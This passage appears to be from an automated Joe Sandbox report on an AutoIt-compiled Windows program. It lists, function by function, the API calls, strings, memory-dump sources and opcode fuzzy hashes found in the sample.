                                                          • GetKeyState.USER32(000000A1), ref: 00940978
                                                          • GetAsyncKeyState.USER32(00000011), ref: 009409A4
                                                          • GetKeyState.USER32(00000011), ref: 009409B2
                                                          • GetAsyncKeyState.USER32(00000012), ref: 009409DB
                                                          • GetKeyState.USER32(00000012), ref: 009409E9
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00940A12
                                                          • GetKeyState.USER32(0000005B), ref: 00940A20
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 9d003f06d872ccc513b6d8ce18ad92cdb067d823a581836c6b15b87a6e5a3eaf
                                                          • Instruction ID: 14a66398acf7559bc31dde6fc2444c0ff57d3c74575cfc4548e72ce8f8e204af
                                                          • Opcode Fuzzy Hash: 9d003f06d872ccc513b6d8ce18ad92cdb067d823a581836c6b15b87a6e5a3eaf
                                                          • Instruction Fuzzy Hash: 3651DF30A0878419FB35D7B04915FEABFB89F81384F08459ED6C6571C3DA759A8CCB91
                                                          Function 0093CE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000001), ref: 0093CE1C
                                                          • GetWindowRect.USER32(00000000,?), ref: 0093CE2E
                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0093CE8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 0093CE97
                                                          • GetWindowRect.USER32(00000000,?), ref: 0093CEA9
                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0093CEFD
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0093CF0B
                                                          • GetWindowRect.USER32(00000000,?), ref: 0093CF1C
                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0093CF5F
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0093CF6D
                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0093CF8A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0093CF97
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                          • String ID:
                                                          • API String ID: 3096461208-0
                                                          • Opcode ID: ecba8759056e517d1f1215da62fb7f5fb52758ecfdb14e5354cd1b011845164e
                                                          • Instruction ID: a1041e988f7349a5f0d01832ee170f64ff6f3ddd8aa287dc30ab468ac03a1288
                                                          • Opcode Fuzzy Hash: ecba8759056e517d1f1215da62fb7f5fb52758ecfdb14e5354cd1b011845164e
                                                          • Instruction Fuzzy Hash: E4517671B10205AFDF18CF68CD95A6EBBBAFB88711F14812DF519E7290D770AD408B50
                                                          Function 008E23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008E2412,?,00000000,?,?,?,?,008E1AA7,00000000,?), ref: 008E1F76
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008E24AF
                                                          • KillTimer.USER32(?,?,?,?,?,008E1AA7,00000000,?,?,008E1EBE,?,?), ref: 008E254A
                                                          • DestroyAcceleratorTable.USER32(00000000,?,00000000,?,?,?,?,008E1AA7,00000000,?,?,008E1EBE,?,?), ref: 0091BFE7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E1AA7,00000000,?,?,008E1EBE,?,?), ref: 0091C018
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E1AA7,00000000,?,?,008E1EBE,?,?), ref: 0091C02F
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008E1AA7,00000000,?,?,008E1EBE,?,?), ref: 0091C04B
                                                          • DeleteObject.GDI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0091C05D
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID:
                                                          • API String ID: 641708696-0
                                                          • Opcode ID: 33e435fdd38010ed29a140518b1b2aa60a09eff961ac9567576656caf037c8d5
                                                          • Instruction ID: 05fe2b24ce6e8bb0d75550e0be98e6d48f4853d5c48340d17324d4244fd863ed
                                                          • Opcode Fuzzy Hash: 33e435fdd38010ed29a140518b1b2aa60a09eff961ac9567576656caf037c8d5
                                                          • Instruction Fuzzy Hash: AC61BD32228744DFDB259F59CD49B2AB7F5FF4631AF108518E046879A0C774A8D0EF94
                                                          Function 008E2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 008E29AB: GetWindowLongW.USER32(?,000000EB,?,?,?,008E1AE0,?,?,?,?,?,?,008E1D8F,?,?,?), ref: 008E29BC
                                                          • GetSysColor.USER32(0000000F,?,?,?,?), ref: 008E25AF
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: ColorLongWindow
                                                          • String ID:
                                                          • API String ID: 259745315-0
                                                          • Opcode ID: bd735ab0a4b1884bec31ff0558226fcd30f40509c89af5d84511140031adf63c
                                                          • Instruction ID: 4ced643075885df251c04b2087c25f05693554ab8c7d6f7e33ec637cca695842
                                                          • Opcode Fuzzy Hash: bd735ab0a4b1884bec31ff0558226fcd30f40509c89af5d84511140031adf63c
                                                          • Instruction Fuzzy Hash: 5541B031108184ABDB215F699C88BB93B69FB5B335F184361FD6ACA1F1D7308C81EB21
                                                          Function 008F29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00900B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008F2A3E,?,00008000), ref: 00900BA7
                                                            • Part of subcall function 00900284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F2A58,?,00008000), ref: 009002A4
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F2ADF
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 008F2C2C
                                                            • Part of subcall function 008F3EBE: _wcscpy.LIBCMT ref: 008F3EF6
                                                            • Part of subcall function 0090386D: _iswctype.LIBCMT ref: 00903875
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                          • API String ID: 537147316-3738523708
                                                          • Opcode ID: 0d8224256dfa9f0dd1b2088fd41db2192ce9c55b0392dd1aa15b24b717590173
                                                          • Instruction ID: 3005ff3d349b569b19bd02e9ee0f9230f3e63ca25a577467905a551c891157c7
                                                          • Opcode Fuzzy Hash: 0d8224256dfa9f0dd1b2088fd41db2192ce9c55b0392dd1aa15b24b717590173
                                                          • Instruction Fuzzy Hash: 2E0257311083459FC724EF24C891AAFBBE5FFD9354F10492DF699932A2DB309A49CB52
                                                          Function 008F2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 009000CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,008F3094), ref: 009000ED
                                                            • Part of subcall function 009008C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,008F309F), ref: 009008E3
                                                          • RegOpenKeyExW.ADVAPI32(?,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008F30E2
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009301BA
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009301FB
                                                          • RegCloseKey.ADVAPI32(?), ref: 00930239
                                                          • _wcscat.LIBCMT ref: 00930292
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 6c67acf40d80050ba8dcfaf5528861384b24e40cd3ffd92114802b951ba453b7
                                                          • Instruction ID: 1bd9098808c00d0cd9aab6badd04131fa7480555ab05fb73a5efa00e237baa08
                                                          • Opcode Fuzzy Hash: 6c67acf40d80050ba8dcfaf5528861384b24e40cd3ffd92114802b951ba453b7
                                                          • Instruction Fuzzy Hash: 7871AF715193059EC710EF68D859ABBBBE8FF95380F40492EF965C32A0EF309944DB92
                                                          Function 0094AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,00970980), ref: 0094AF4E
                                                          • GetDriveTypeW.KERNEL32(00000061,0099B5F0,00000061), ref: 0094B018
                                                          • _wcscpy.LIBCMT ref: 0094B042
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                          • API String ID: 2820617543-1000479233
                                                          • Opcode ID: 6ed2bc62c3905e85718e0a488c3ff9ac821efd0e60abdf6c4bd2a8aa01899161
                                                          • Instruction ID: d12f6d3456dc2098089fae94477dc5bb03892c551ff6835b5eb77be21bdae6e7
                                                          • Opcode Fuzzy Hash: 6ed2bc62c3905e85718e0a488c3ff9ac821efd0e60abdf6c4bd2a8aa01899161
                                                          • Instruction Fuzzy Hash: FD51CD711583059FC710EF28C891EAAB7A9FF95704F50481DF59A872E2EB31ED09CA53
                                                          Function 008E4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: __i64tow__itow__swprintf
                                                          • String ID: %.15g$0x%p$False$True
                                                          • API String ID: 421087845-2263619337
                                                          • Opcode ID: ca6d4036ce2ab2b221d05e93a7772e8c5e31d4561e41b3e6d6ad2f1356cb1d30
                                                          • Instruction ID: 5dadd26715d4ca0449c55650475715bffebba89440c4a512f6428c21c5887bb0
                                                          • Opcode Fuzzy Hash: ca6d4036ce2ab2b221d05e93a7772e8c5e31d4561e41b3e6d6ad2f1356cb1d30
                                                          • Instruction Fuzzy Hash: F241B17170820DAEEB24DF78DD42EBA73E8FF89304F2044AAE549D6292EA3199419711
                                                          Function 00967777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0096778F
                                                          • CreateMenu.USER32 ref: 009677AA
                                                          • SetMenu.USER32(?,00000000), ref: 009677B9
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00967846
                                                          • IsMenu.USER32(?), ref: 0096785C
                                                          • CreatePopupMenu.USER32 ref: 00967866
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00967893
                                                          • DrawMenuBar.USER32 ref: 0096789B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                          • String ID: 0$F
                                                          • API String ID: 176399719-3044882817
                                                          • Opcode ID: b938a55341f0cf6a78d141af30941e7f55e7be375730ae6a789964f3f9e93db1
                                                          • Instruction ID: 63932034a750cfda222c99ab487c65f5d0d6c9c65ef8da31b61ef0ba290e3957
                                                          • Opcode Fuzzy Hash: b938a55341f0cf6a78d141af30941e7f55e7be375730ae6a789964f3f9e93db1
                                                          • Instruction Fuzzy Hash: A1415975A14209EFDB10DFA5D888A9ABBF9FF89314F144429F949A7360D730AD10DF90
                                                          Function 00967AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00967B83
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00967B8A
                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00967B9D
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00967BA5
                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00967BB0
                                                          • DeleteDC.GDI32(00000000), ref: 00967BB9
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00967BC3
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00967BD7
                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00967BE3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                          • String ID: static
                                                          • API String ID: 2559357485-2160076837
                                                          • Opcode ID: 23d8d13911fe9052ccc49a13694f850044e4eebecd5a11b5f089997204e62466
                                                          • Instruction ID: b1eaa54e24a1497fa29351667afe5c8456db77e8f2b4caf97d3cc3c5a7775b42
                                                          • Opcode Fuzzy Hash: 23d8d13911fe9052ccc49a13694f850044e4eebecd5a11b5f089997204e62466
                                                          • Instruction Fuzzy Hash: 8B318832118218EBDF119FA4DC49FDB7B69FF89764F100215FA59A21A0C735E860EBA4
                                                          Function 008F514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 008F5156
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 008F5165
                                                          • LoadIconW.USER32(00000063), ref: 008F517C
                                                          • LoadIconW.USER32(000000A4), ref: 008F518E
                                                          • LoadIconW.USER32(000000A2), ref: 008F51A0
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008F51C6
                                                          • RegisterClassExW.USER32(?), ref: 008F521C
                                                            • Part of subcall function 008E3411: GetSysColorBrush.USER32(0000000F), ref: 008E3444
                                                            • Part of subcall function 008E3411: RegisterClassExW.USER32(00000030), ref: 008E346E
                                                            • Part of subcall function 008E3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008E347F
                                                            • Part of subcall function 008E3411: InitCommonControlsEx.COMCTL32(?), ref: 008E349C
                                                            • Part of subcall function 008E3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008E34AC
                                                            • Part of subcall function 008E3411: LoadIconW.USER32(000000A9), ref: 008E34C2
                                                            • Part of subcall function 008E3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008E34D1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: ea9433883efa869304b83c6476a0ffeee56c3a26a36e0c43e8aa63e2035f2d3f
                                                          • Instruction ID: 2a6ea03b8ec0b75263f1e74d9bf8978101dc312c7d75a021eb7e44faf96c5d78
                                                          • Opcode Fuzzy Hash: ea9433883efa869304b83c6476a0ffeee56c3a26a36e0c43e8aa63e2035f2d3f
                                                          • Instruction Fuzzy Hash: B3214D71A29308EFEB109FA4ED0AB9DBBB4FB49310F004159FA18A62A0D7B55550AF84
                                                          Function 00907030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 0090706B
                                                            • Part of subcall function 00908D58: __getptd_noexit.LIBCMT ref: 00908D58
                                                          • __gmtime64_s.LIBCMT ref: 00907104
                                                          • __gmtime64_s.LIBCMT ref: 0090713A
                                                          • __gmtime64_s.LIBCMT ref: 00907157
                                                          • __allrem.LIBCMT ref: 009071AD
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009071C9
                                                          • __allrem.LIBCMT ref: 009071E0
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009071FE
                                                          • __allrem.LIBCMT ref: 00907215
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00907233
                                                          • __invoke_watson.LIBCMT ref: 009072A4
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000996000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714097565.00000000009A4000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714159090.00000000009A9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_22_2_8e0000_Soldiers.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                          • String ID:
                                                          • API String ID: 384356119-0
                                                          • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction ID: cd95f92cd6dda8785870e69f03b73a80db9490a4d6ea6a17f23343bb055f377a
                                                          • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                          • Instruction Fuzzy Hash: 57719371E04717AFE7149AB9CC41BAAF3B9AF55334F148229F524D66C1E770EA408790
                                                          Function 00942CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 00942CE9
                                                          • GetMenuItemInfoW.USER32(009A7890,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00942D4A
                                                          • SetMenuItemInfoW.USER32(009A7890,00000004,00000000,00000030), ref: 00942D80
                                                          • Sleep.KERNEL32(000001F4), ref: 00942D92
                                                          • GetMenuItemCount.USER32(?,?,000000FF,?,?), ref: 00942DD6
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00942DF2
                                                          • GetMenuItemID.USER32(?,-00000001), ref: 00942E1C
                                                          • GetMenuItemID.USER32(?,?), ref: 00942E61
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00942EA7
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030,?,000000FF,?,?), ref: 00942EBB
                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00942EDC
                                                          Memory Dump Source
                                                          • Source File: 00000016.00000002.2713938215.00000000008E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 008E0000, based on PE: true
                                                          • Associated: 00000016.00000002.2713892469.00000000008E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                          • Associated: 00000016.00000002.2714031459.0000000000970000.00000002.00000001.01000000.00000005.sdmpDownload File
